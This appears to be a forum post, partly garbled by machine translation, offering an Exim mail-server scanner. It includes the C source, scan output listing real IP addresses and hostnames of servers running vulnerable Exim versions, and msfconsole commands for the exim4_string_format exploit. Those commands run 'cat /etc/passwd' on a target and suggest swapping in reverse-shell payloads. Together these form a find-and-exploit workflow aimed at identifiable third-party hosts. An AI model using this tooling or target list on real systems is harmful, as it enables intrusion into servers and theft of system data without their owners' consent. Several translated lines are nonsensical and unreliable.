- Exim Remote Scanner nood Server
- Peace and mercy of God be upon
- A simple tool for finding Exim servers on a network range: it connects to each
- host's SMTP port, reads the greeting banner and records the Exim version it advertises,
- "Abu so-called hyper or when some Nud"
- so that hosts running a version affected by the Exim SMTP string-format vulnerability (see the Metasploit module below) can be picked out.
- Code:
- ./exim_scan -s 80.237.132.33 -e 80.237.255.255 -t 20 -n 50 -p 25 -l sec4ever.txt
- Exim4 remote Scanner.
- Set highest priority
- Set Max open files to: 1024
- Set Logfile: sec4ever.txt
- Scan start: 31711 hosts, 50 threads ...
- -------------------------------------------------- --------------
- 80.237.141.10 220 srv05.tj-edv.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:17:22 +0100
- 80.237.145.35 220 mail.dalailama-hamburg.de ESMTP exim 4.50 Fri, 24 Dec 2010 12:20:50 +0100
- 80.237.153.41 220-server.event-it-store.de ESMTP exim 4.69 # 1 Fri, 24 Dec 2010 12:26:46 +0100
- 80.237.154.40 220 portabox.local.com ESMTP exim 4.68 Fri, 24 Dec 2010 11:27:01 +0000
- 80.237.154.66 220 mm1.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:27:09 +0100
- 80.237.154.117 220 ds80-237-154-117.dedicated.hosteurope.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:10 +0100
- 80.237.155.85 220 qsmirror01.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
- 80.237.155.86 220 qsmirror02.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
- 80.237.157.25 220 secksie.org ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:54 +0100
- 80.237.157.45 220 server.mfkom.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:59 +0100
- 80.237.157.97 220 de1.coguan.com ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:17 +0100
- 80.237.158.89 220 sester.sidebysite.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:18 +0100
- 80.237.158.37 220 homer.pl ESMTP exim 4.69 Fri, 24 Dec 2010 12:25:40 +0100
- 80.237.158.45 220 mm2.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:19 +0100
- 80.237.159.54 220 jugene.betalounge.com ESMTP exim 4.69 Fri, 24 Dec 2010 12:28:39 +0100
- 80.237.162.171 220 familie-deden.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:49 +0100
- Source file (C):
/*
 * Build:
 *   Linux:   gcc -o exim_scan exim_scan.c -O3 -Wall -pipe -DLinux -lpthread
 *   FreeBSD: gcc -o exim_scan exim_scan.c -O3 -Wall -pipe -lpthread
 */
#include <arpa/inet.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <poll.h>
#include <pthread.h>
#include <regex.h>
#include <signal.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
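#define TIMEOUT 10            /* default per-host timeout in seconds (-t) */
#define MAXHOSTS 0x7fffffff   /* upper bound on hosts per run (INT_MAX) */
#define THREADS 256           /* default number of worker threads (-n) */

/*
 * POLLRDNORM ("normal data may be read") is an XSI extension that some
 * libcs only expose under a feature-test macro.  Define it only when
 * <poll.h> did not, instead of keying on -DLinux, so the hand-rolled
 * value can never disagree with the system header on a platform that
 * does define it.
 */
#ifndef POLLRDNORM
#define POLLRDNORM 0x040
#endif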
- /////////////////////////////// .... ///////////////////////////////////////
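/* Where matches are written: stdout, or the -l logfile once it is opened. */
static FILE *output = NULL;

/*
 * No "extern int errno;" here: <errno.h> is included above and C11 (7.5)
 * allows errno to be a macro, so declaring it by hand is undefined
 * behaviour and breaks on libcs where it expands to a function call.
 */

static char *start = NULL;   /* first IP of the range (-s), dotted quad */
static char *end = NULL;     /* last IP of the range (-e), dotted quad */
static int port = 25;        /* TCP port to probe (-p) */

/* Number of IPs to scan: end - start + 1. */
static int totnum = 0;
/* Id of the most recently created worker; never joined (workers detach). */
static pthread_t tid;
/* Index of the host currently being dispatched by main(). */
static int inum = 0;
/* Scan start / end timestamps. */
static time_t t1, t2;
/* Maximum number of concurrent workers (-n). */
static int thdnum = THREADS;
/* Workers currently running; guarded by mutex_curnum. */
static int curnum = 0;
/* Per-host timeout in seconds (-t). */
static int timeout = TIMEOUT;
/* Mutex protecting 'curnum'. */
static pthread_mutex_t mutex_curnum = PTHREAD_MUTEX_INITIALIZER;
/* Signalled whenever 'curnum' changes. */
static pthread_cond_t cond_curnum = PTHREAD_COND_INITIALIZER;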
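/*
 * atexit() hook: close the -l logfile if one was opened.
 *
 * Deliberately does NOT call _exit(): an atexit handler that _exit()s
 * with EXIT_SUCCESS turns every exit(EXIT_FAILURE) / return -1 in main()
 * into exit status 0, hiding failures from scripts that drive the tool.
 * Note that on the signal path (on_terminate -> exit) detached workers may
 * still be writing to 'output' while it is closed here.
 */
static void terminate(void)
{
    if (output != NULL && output != stdout) {
        fclose(output);
        output = stdout;
    }
}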
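/*
 * Handler for the signals hooked in init_signal(): print progress and exit.
 *
 * The hosts/sec figure is guarded against a zero elapsed time: a signal
 * arriving within the first second of the scan used to divide by zero.
 * fprintf(), pthread_*_destroy() and exit() are not async-signal-safe;
 * they are kept because the process is terminating anyway, but a signal
 * that lands while a worker holds mutex_curnum can still deadlock.
 */
static void on_terminate(int signo)
{
    time_t now = time(NULL);
    long elapsed = (long)(now - t1);
    long done = (long)inum + 1;

    fprintf(stderr, "----------------------------------------------------------------\n\n");
    fprintf(stderr, "Receive SIG NUM: %d %ld/%d hosts, %ld secs, %ld hosts/sec.\n",
            signo, done, totnum, elapsed, elapsed > 0 ? done / elapsed : done);
    pthread_mutex_destroy(&mutex_curnum);
    pthread_cond_destroy(&cond_curnum);
    exit(EXIT_SUCCESS);
}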
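/*
 * SIGCHLD handler: reap any exited children without blocking.
 *
 * waitpid() overwrites errno (ECHILD once nothing is left to reap), so the
 * value is saved and restored: a handler that clobbers errno corrupts the
 * error the interrupted code was about to inspect.  The fprintf() is not
 * async-signal-safe; it is retained from the original but should not be
 * relied on.
 */
static void on_sigchld(int signo)
{
    int saved_errno = errno;
    int status;
    pid_t pid;

    (void)signo;
    while ((pid = waitpid(-1, &status, WNOHANG)) > 0) {
        fprintf(stderr, "child <%u> terminated", (unsigned int)pid);
    }
    errno = saved_errno;
}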
/*
 * Signal and exit-hook setup.
 */
/*
 * Install the process-wide handlers.
 *
 * Signals 1..8 are hooked by number (SIGHUP .. SIGFPE on Linux; the
 * numbering is platform-dependent), plus SIGTERM and SIGALRM, all routed
 * to on_terminate; SIGCHLD reaps children via on_sigchld; terminate()
 * is registered to run at exit.  signal() rather than sigaction() keeps
 * the original (platform-defined) restart/reset semantics.
 */
static void init_signal(void)
{
    int signo = 1;

    atexit(terminate);
    while (signo < 9) {
        signal(signo, on_terminate);
        signo++;
    }
    signal(SIGTERM, on_terminate);
    signal(SIGALRM, on_terminate);
    signal(SIGCHLD, on_sigchld);
}
/*
 * New:
 * TCP connect on a non-blocking socket; host is given as an IP string.
 * Millisecond timeout, so it is fast.
 * ;D
 * 2003/06/23 added by Sam
 */
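/*
 * Non-blocking TCP connect to dotted-quad 'ip':'port' with a millisecond
 * 'timeout'.  Returns a connected, blocking socket with SO_KEEPALIVE set,
 * or -1 with errno describing the failure (EINVAL for a bad address or
 * port, ETIMEDOUT when the deadline passes, the pending socket error
 * otherwise).
 *
 * Fixes relative to the original:
 *  - waits with poll() instead of select(): with -n close to the raised
 *    RLIMIT_NOFILE, descriptor numbers exceed FD_SETSIZE and FD_SET() on
 *    them writes past the fd_set on the stack;
 *  - the sub-second part of the timeout is converted to microseconds
 *    properly (the old code stored the millisecond remainder in tv_usec);
 *  - an unparsable address or out-of-range port fails up front instead of
 *    connecting to INADDR_NONE (255.255.255.255) or a truncated port;
 *  - getsockopt() gets a socklen_t, not a size_t;
 *  - close() runs before errno is set, so it cannot clobber the value;
 *  - perror() messages no longer embed a newline in front of the
 *    ": strerror" suffix perror appends.
 */
static int tcpConnect(const char *ip, unsigned int port, unsigned int timeout)
{
    int sock, flag, retval, ms, pe = 0;
    socklen_t pe_len = sizeof(pe);
    struct pollfd pfd;
    struct sockaddr_in addr;

    if (port == 0 || port > 65535) {
        errno = EINVAL;
        return -1;
    }
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons((unsigned short)port);
    if (ip == NULL || inet_pton(AF_INET, ip, &addr.sin_addr) != 1) {
        errno = EINVAL;
        return -1;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("tcpConnect: socket");
        return -1;
    }

    flag = fcntl(sock, F_GETFL);
    if (flag == -1 || fcntl(sock, F_SETFL, flag | O_NONBLOCK) < 0) {
        perror("tcpConnect: fcntl");
        close(sock);
        return -1;
    }

    if (connect(sock, (const struct sockaddr *)&addr, sizeof(addr)) < 0 &&
        errno != EINPROGRESS) {
        int saved = errno;
        close(sock);
        errno = saved;
        return -1;
    }

    /* poll() takes int milliseconds; clamp so a huge value cannot go
     * negative, which poll() would treat as "wait forever". */
    ms = timeout > (unsigned int)INT_MAX ? INT_MAX : (int)timeout;
    pfd.fd = sock;
    pfd.events = POLLIN | POLLOUT;
    pfd.revents = 0;
    retval = poll(&pfd, 1, ms);
    if (retval <= 0) {
        int saved = retval == 0 ? ETIMEDOUT : errno;
        close(sock);
        errno = saved;
        return -1;
    }

    /* Writable after a non-blocking connect means "finished", not
     * "succeeded": the outcome is in SO_ERROR. */
    if (getsockopt(sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
        perror("tcpConnect: getsockopt");
        close(sock);
        return -1;
    }
    if (pe != 0) {
        close(sock);
        errno = pe;
        return -1;
    }

    /* Back to the original (blocking) flags for the caller's read(). */
    if (fcntl(sock, F_SETFL, flag) < 0) {
        perror("tcpConnect: fcntl");
        close(sock);
        return -1;
    }
    pe = 1;
    if (setsockopt(sock, SOL_SOCKET, SO_KEEPALIVE, &pe, sizeof(pe)) < 0) {
        perror("tcpConnect: setsockopt");
        close(sock);
        return -1;
    }
    return sock;
}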
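/*
 * Probe one host: connect to 'port', read the SMTP greeting and, when it
 * advertises Exim 4.00-4.69, write "host banner" to 'output' (and echo it
 * to stderr when output is a file).  Uses the file-scope 'port', 'timeout'
 * and 'output'.  The per-host budget is split as in the original: half
 * for the connect, half for the banner.
 *
 * The match is case-sensitive ("Exim 4..."), as in the original; the
 * sample output in the accompanying text shows lowercase "exim", which
 * may be a rendering artefact -- verify against a live banner before
 * relying on it.
 *
 * Fixes relative to the original:
 *  - the banner is NUL-terminated before regexec(); a full 512-byte read
 *    used to run the matcher off the end of 'resp';
 *  - 'sock' starts at -1 and is only closed when it is a real descriptor
 *    (the regcomp-failure path used to close an uninitialised int);
 *  - regfree() only runs when regcomp() succeeded;
 *  - every control byte in the banner (not just CR/LF) is replaced by a
 *    space before logging, so a hostile banner cannot drive the terminal
 *    with escape sequences or forge extra lines in the logfile;
 *  - poll() waits on POLLIN rather than the XSI-only POLLRDNORM (on
 *    Linux readable data sets both).
 */
static void check_exim(char *host)
{
    int sock = -1;
    int have_re = 0;
    int retval, i;
    char resp[512];
    char errbuf[1024];
    struct pollfd fds[1];
    regex_t re;
    regmatch_t subs[10];
    /* Exim 4.00 .. 4.69 */
    const char *pattern = "Exim 4\\.[0-6][0-9]";

    retval = regcomp(&re, pattern, REG_EXTENDED);
    if (retval != 0) {
        regerror(retval, &re, errbuf, sizeof(errbuf));
        /* fprintf(stderr, "error: regcomp: %s\n", errbuf); */
        goto out;
    }
    have_re = 1;

    sock = tcpConnect(host, port, (timeout - timeout / 2) * 1000);
    if (sock < 0) {
        goto out;
    }

    fds[0].fd = sock;
    fds[0].events = POLLIN;
    fds[0].revents = 0;
    retval = poll(fds, 1, (timeout - timeout / 2) * 1000);
    if (retval <= 0 || !(fds[0].revents & POLLIN)) {
        goto out;
    }

    /* Leave room for the terminator: regexec() needs a C string. */
    retval = (int)read(sock, resp, sizeof(resp) - 1);
    if (retval <= 0) {
        goto out;
    }
    resp[retval] = '\0';

    /* Neutralise CR/LF and every other control byte (including NUL) so the
     * banner is one printable line in the console and the logfile. */
    for (i = 0; i < retval; i++) {
        unsigned char c = (unsigned char)resp[i];
        if (c < 0x20 || c == 0x7f) {
            resp[i] = ' ';
        }
    }

    retval = regexec(&re, resp, 10, subs, 0);
    if (retval == REG_NOMATCH) {
        goto out;
    }
    if (retval != 0) {
        regerror(retval, &re, errbuf, sizeof(errbuf));
        /* fprintf(stderr, "error: regexec: %s\n", errbuf); */
        goto out;
    }

    /* Matched: echo to the console as well when logging to a file. */
    if (output != stdout) {
        fprintf(stderr, "%-40s %s\n", host, resp);
    }
    fprintf(output, "%-40s %s\n", host, resp);

out:
    if (sock >= 0) {
        close(sock);
        sock = -1;
    }
    if (have_re) {
        regfree(&re);
    }
}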
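/*
 * Worker-thread entry: scan one host ('arg' is a malloc'd dotted quad
 * whose ownership passes to this thread and is freed here), then
 * decrement curnum and wake the dispatcher.
 *
 * All signals are blocked in the worker so the process-wide handlers
 * installed by init_signal() run on the main thread.  pthread_sigmask()
 * replaces sigprocmask(): POSIX leaves the latter unspecified in a
 * multithreaded process, and it reports failure as a return value rather
 * than through errno, so the message prints strerror(err).  Signal-mask
 * failures are fatal for the whole process, as in the original.
 */
static void *init_scan(void *arg)
{
    pthread_t self = pthread_self();
    sigset_t block_all;
    int err;

    if (sigfillset(&block_all) != 0) {
        fprintf(stderr, "sigfillset error in thread [%u]\n", (unsigned int)self);
        exit(EXIT_FAILURE);
    }
    err = pthread_sigmask(SIG_BLOCK, &block_all, NULL);
    if (err != 0) {
        fprintf(stderr, "pthread_sigmask error in thread [%u]: %s\n",
                (unsigned int)self, strerror(err));
        exit(EXIT_FAILURE);
    }
    pthread_detach(self);

    check_exim(arg);
    free(arg);

    pthread_mutex_lock(&mutex_curnum);
    curnum--;
    pthread_cond_broadcast(&cond_curnum);
    pthread_mutex_unlock(&mutex_curnum);
    return NULL;
}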
/*
 * Print the usage message.
 */
/* Write the command-line synopsis to stderr; 's' is the program name (argv[0]). */
static void usage(char *s)
{
    fputs("Usage: ", stderr);
    fputs(s, stderr);
    fputs(" [-s startip] [-e endip] [-t timeout] [-n maxthreadnum]"
          " [-p port:25] [-l logfile] [-h?]\n\n", stderr);
}
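/*
 * Entry point.  Parses -s/-e (inclusive IPv4 range), -t (seconds per
 * host), -n (worker threads), -p (port, default 25) and -l (logfile,
 * default ./exim.ips), then dispatches one detached worker per address,
 * never more than thdnum at once, waits for the last one and prints the
 * rate summary.  Scanning address ranges you are not authorised to test
 * is unlawful in most jurisdictions; use this only on your own networks.
 *
 * Fixes relative to the original:
 *  - both -s and -e are required: the old test (start == NULL && end ==
 *    NULL) let a single endpoint through and then read the other,
 *    uninitialised, in_addr;
 *  - an end address below the start address is rejected instead of
 *    wrapping into a ~4-billion-host scan, and the MAXHOSTS check is done
 *    in unsigned arithmetic so it can actually fire;
 *  - -t, -n and -p are range-checked (a non-positive timeout became an
 *    infinite poll(), a port above 65535 was silently truncated);
 *  - the dispatcher re-checks curnum in a loop around pthread_cond_wait(),
 *    so a spurious wakeup cannot exceed the thread limit;
 *  - the rlimit is re-read after setrlimit() (which may be refused) and
 *    never used when getrlimit() failed;
 *  - pthread_create() returns its error code; it is no longer read from
 *    errno;
 *  - the log file is opened with "w+" (the old mode string had a stray
 *    space) and the getopt string no longer declares '?' as an option
 *    with an argument.
 */
int main(int argc, char *argv[])
{
    int opt, err;
    struct rlimit rl;
    struct in_addr current_ip;  /* next address to dispatch */
    struct in_addr final_ip;    /* last address to scan */
    unsigned long first, last, span;
    char *host, *file = "./exim.ips";

    fprintf(stderr, "Exim4 Remote Scanner.\n\n");
    while ((opt = getopt(argc, argv, "hs:e:t:n:p:l:")) != -1) {
        switch (opt) {
        case 's':
            start = strdup(optarg);
            if (start == NULL || !inet_aton(start, &current_ip)) {
                fprintf(stderr, "invalid IP address: %s\n", optarg);
                return EXIT_FAILURE;
            }
            break;
        case 'e':
            end = strdup(optarg);
            if (end == NULL || !inet_aton(end, &final_ip)) {
                fprintf(stderr, "invalid IP address: %s\n", optarg);
                return EXIT_FAILURE;
            }
            break;
        case 't':
            timeout = atoi(optarg);
            if (timeout <= 0) {
                fprintf(stderr, "invalid timeout: %s\n", optarg);
                return EXIT_FAILURE;
            }
            break;
        case 'n':
            thdnum = atoi(optarg);
            if (thdnum <= 0) {
                fprintf(stderr, "invalid thread count: %s\n", optarg);
                return EXIT_FAILURE;
            }
            break;
        case 'p':
            port = atoi(optarg);
            if (port <= 0 || port > 65535) {
                fprintf(stderr, "invalid port: %s\n", optarg);
                return EXIT_FAILURE;
            }
            break;
        case 'l':
            file = strdup(optarg);
            break;
        case 'h':
        case '?':
        default:
            usage(argv[0]);
            exit(EXIT_FAILURE);
        }
    }
    if (start == NULL || end == NULL) {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    first = ntohl(current_ip.s_addr);
    last = ntohl(final_ip.s_addr);
    if (last < first) {
        fprintf(stderr, "end address %s is below start address %s\n", end, start);
        exit(EXIT_FAILURE);
    }
    span = last - first + 1;
    if (span > (unsigned long)MAXHOSTS) {
        fprintf(stderr, "Too many hosts, MAX hosts: %d\n", MAXHOSTS);
        exit(EXIT_FAILURE);
    }
    totnum = (int)span;

    init_signal();

    /* Set highest priority (only possible as root). */
    if (geteuid() == 0) {
        fprintf(stderr, "Set highest priority\n");
        setpriority(PRIO_PROCESS, 0, -20);
    }

    /* Raise the open-file limit; each worker holds one socket. */
    if (getrlimit(RLIMIT_NOFILE, &rl) == 0) {
        fprintf(stderr, "Set Max open files to: %d\n", (int)rl.rlim_max);
        rl.rlim_cur = rl.rlim_max;
        setrlimit(RLIMIT_NOFILE, &rl);
        /* Re-read: setrlimit may have been refused, leaving the old cap. */
        if (getrlimit(RLIMIT_NOFILE, &rl) == 0 && rl.rlim_cur != RLIM_INFINITY &&
            (rlim_t)thdnum + 10 > rl.rlim_cur) {
            thdnum = rl.rlim_cur > 11 ? (int)(rl.rlim_cur - 10) : 1;
            fprintf(stderr, "Too many threads, set threads number to %d\n", thdnum);
        }
    }

    output = stdout;
    if (file != NULL) {
        fprintf(stderr, "Set Logfile: %s\n", file);
        if ((output = fopen(file, "w+")) == NULL) {
            fprintf(stderr, "Error in open Logfile %s: %s\n", file, strerror(errno));
            return EXIT_FAILURE;
        }
    }

    fprintf(stderr, "Scan start: %d hosts, %d threads ...\n\n", totnum, thdnum);
    fprintf(stderr, "----------------------------------------------------------------\n");
    t1 = time(NULL);
    for (inum = 0; inum < totnum; inum++) {
        /* 16 bytes: longest dotted quad is 15 chars plus NUL.  The buffer
         * is handed to the worker, which frees it. */
        host = calloc(16, 1);
        if (host == NULL) {
            fprintf(stderr, "No memory left\n");
            return EXIT_FAILURE;
        }
        /* inet_ntoa's static buffer is only touched from this thread. */
        snprintf(host, 16, "%s", inet_ntoa(current_ip));
        current_ip.s_addr = htonl(ntohl(current_ip.s_addr) + 1);

        pthread_mutex_lock(&mutex_curnum);
        while (curnum >= thdnum) {
            pthread_cond_wait(&cond_curnum, &mutex_curnum);
        }
        curnum++;
        pthread_mutex_unlock(&mutex_curnum);

        err = pthread_create(&tid, NULL, init_scan, host);
        if (err != 0) {
            fprintf(stderr, "pthread_create: %s\n", strerror(err));
            exit(EXIT_FAILURE);
        }
    }

    /* Wait for the last workers to finish. */
    pthread_mutex_lock(&mutex_curnum);
    while (curnum > 0) {
        pthread_cond_wait(&cond_curnum, &mutex_curnum);
    }
    pthread_mutex_unlock(&mutex_curnum);

    t2 = time(NULL);
    fprintf(stderr, "----------------------------------------------------------------\n");
    fprintf(stderr, "\nScan completed, %ld sec", (long)(t2 - t1));
    if (t2 - t1 > 0)
        fprintf(stderr, ", %ld hosts/sec.\n", (long)totnum / (long)(t2 - t1));
    else
        fprintf(stderr, "\n");
    pthread_mutex_destroy(&mutex_curnum);
    pthread_cond_destroy(&cond_curnum);
    return EXIT_SUCCESS;
}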
- Exploiting the vulnerability (msfconsole):
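# Only run against hosts you are authorised to test.
# rhost below is the *start* of the scanned range, not one of the hosts the
# scan reported; replace it with a host whose banner showed Exim 4.00-4.69.
use exploit/unix/smtp/exim4_string_format
set rhost 80.237.132.33
set payload cmd/unix/generic
set CMD 'cat /etc/passwd'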
- You can change the payload from `cmd/unix/generic` to a bind or reverse-shell payload as needed.
- The latter rights reserved for a guest
- Source